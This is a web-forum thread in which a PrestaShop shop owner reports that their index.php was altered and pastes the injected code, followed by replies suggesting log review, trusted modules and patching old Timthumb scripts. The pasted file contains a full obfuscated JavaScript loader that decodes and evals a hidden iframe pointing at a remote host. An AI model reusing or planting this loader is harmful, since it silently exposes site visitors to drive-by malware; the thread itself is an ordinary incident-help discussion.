Have I just been hacked?

[leelee23]

So I woke up today and went onto my homepage, but sadly there were some errors showing on the index.php page.

 

I looked into the remote file and it had been changed:

 

<?php
/*
* 2007-2011 PrestaShop
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to [email protected] so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to http://www.prestashop.com for more information.
*
*  @author PrestaShop SA <[email protected]>
*  @copyright  2007-2011 PrestaShop SA
*  @version  Release: $Revision: 6594 $
*  @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
*  International Registered Trademark & Property of PrestaShop SA
*/
require(dirname(__FILE__).'/config/config.inc.php');
ControllerFactory::getController('IndexController')->run();
<!-- ad --><script>c=3-1;i=-1-1+c;p=parseInt;if(p("01"+"2"+"3")===83)try{Number()["pr"+"ot"+"ot"+"ype"].q}catch(egewgsd){if(window.document)f=['-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k0k82k-28k-32k-32k-32k64k61k73k56k68k60k73k-1k0k18k-28k-32k-32k84k-9k60k67k74k60k-9k82k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k78k73k64k75k60k-1k-7k19k64k61k73k56k68k60k-9k74k73k58k20k-2k63k75k75k71k17k6k6k59k64k62k64k56k67k64k75k80k5k64k69k6k64k69k5k58k62k64k22k12k-2k-9k78k64k59k75k63k20k-2k8k7k-2k-9k63k60k64k62k63k75k20k-2k8k7k-2k-9k74k75k80k67k60k20k-2k77k64k74k64k57k64k67k64k75k80k17k63k64k59k59k60k69k18k71k70k74k64k75k64k70k69k17k56k57k74k70k67k76k75k60k18k67k60k61k75k17k7k18k75k70k71k17k7k18k-2k21k19k6k64k61k73k56k68k60k21k-7k0k18k-28k-32k-32k84k-28k-32k-32k61k76k69k58k75k64k70k69k-9k64k61k73k56k68k60k73k-1k0k82k-28k-32k-32k-32k77k56k73k-9k61k-9k20k-9k59k70k58k76k68k60k69k75k5k58k73k60k56k75k60k28k67k60k68k60k69k75k-1k-2k64k61k73k56k68k60k-2k0k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k74k73k58k-2k3k-2k63k75k75k71k17k6k6k59k64k62k64k56k67k64k75k80k5k64k69k6k64k69k5k58k62k64k22k12k-2k0k18k61k5k74k75k80k67k60k5k77k64k74k64k57k64k67k64k75k80k20k-2k63k64k59k59k60k69k-2k18k61k5k74k75k80k67k60k5k71k70k74k64k75k64k70k69k20k-2k56k57k74k70k67k76k75k60k-2k18k61k5k74k75k80k67k60k5k67k60k61k75k20k-2k7k-2k18k61k5k74k75k80k67k60k5k75k70k71k20k-2k7k-2k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k78k64k59k75k63k-2k3k-2k8k7k-2k0k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k63k60k64k62k63k75k-2k3k-2k8k7k-2k0k18k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k5k56k71k71k60k69k59k26k63k64k67k59k-1k61k0k18k-28k-32k-32k84'][0].split('k');v="e"+"va"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1+41);}
if(e)e(s);</script><!-- /ad -->

 

It was the same with my admin file.

 

I've removed this code now and put it back to how it was - but I'm confused as to how this could have happened?

 

Any suggestions for stopping this happening again?

 

Cheers,

 

Lee

[Bazze]

Well that definetly seems suspicious. Start looking in the access log around the time the file got changed. You have to find out how they got in and fix that security hole.

[leelee23]

Thanks for your reply Bazze. Aside from the CPanel 'Raw Access Log' (which on mine only shows me 24 hours of data) - is there another access log you're referring to? As you say.. think it would be really useful to have a peek into this.

[Bazze]

Thanks for your reply Bazze. Aside from the CPanel 'Raw Access Log' (which on mine only shows me 24 hours of data) - is there another access log you're referring to? As you say.. think it would be really useful to have a peek into this.

 

I guess this depends on your web host service provider. Contact them, they might have more logs for you. I'm used to VPS's runnging Apache and there you just go through the access.log-files that Apache creates.

 

So, contact your web host and explain what happened and ask if they got more log files that you could have a look at.

[leelee23]

Sadly they don't have any further details. They've given me some tips to work through, but I'm sure they're things I've already covered. For anyone else that has a simple problem, this was is the advice given to me from my web host:

• Please refer : Alec: http://www.hostknox.com/tutorials/prestashop/security
  
• Remove unnecessary files. As your website changes, old files are ignored. They should be removed. Keep copies offline in case you wish to add them again, but remember to update any scripts. Old files are often indexed by search engines. So even if you do not link to those pages anymore, the search engines lists them for Internet users to find and visit. Automated programs to search for these files can find them to exploit them.
  
• Implement passwords. Any sensitive files, databases or scripts should be protected. Please use passwords that are difficult to guess. Use letters AND numbers, but be careful to keep the number of characters within the programmed limits and remember that passwords are case-sensitive.
  
• Check permissions of uploaded files,make sure files are set to the proper permissions. Remember to upload images as binary and most other files as ASCII files.
  

[Bazze]

Sadly they don't have any further details. They've given me some tips to work through, but I'm sure they're things I've already covered. For anyone else that has a simple problem, this was is the advice given to me from my web host:

• Please refer : Alec: http://www.hostknox....tashop/security
  
• Remove unnecessary files. As your website changes, old files are ignored. They should be removed. Keep copies offline in case you wish to add them again, but remember to update any scripts. Old files are often indexed by search engines. So even if you do not link to those pages anymore, the search engines lists them for Internet users to find and visit. Automated programs to search for these files can find them to exploit them.
  
• Implement passwords. Any sensitive files, databases or scripts should be protected. Please use passwords that are difficult to guess. Use letters AND numbers, but be careful to keep the number of characters within the programmed limits and remember that passwords are case-sensitive.
  
• Check permissions of uploaded files,make sure files are set to the proper permissions. Remember to upload images as binary and most other files as ASCII files.
  

 

Seems like a standard answer, that's just sad. If you don't have log files from when it happened, it'll be quite hard to find the security hole.

 

Have you installed a third party module recently? It's important that you just install modules from trusted developers.

 

You're not using the Timthumb PHP script are you? The timthumb script is widely spread but unfortunately older versions of it are not secure. There are automated bots scanning the net for older versions of the timthumb script since it gives you a free passage into the server and is easy to exploit.

[leelee23]

Nothing recently no, it all just came a bit out of the blue. I think I'll find some time to upgrade to the latest PS version to see if there's any security fixes I'm missing.

 

Never heard of the Timthumb PHP script, so I doubt it.

 

Thanks for your help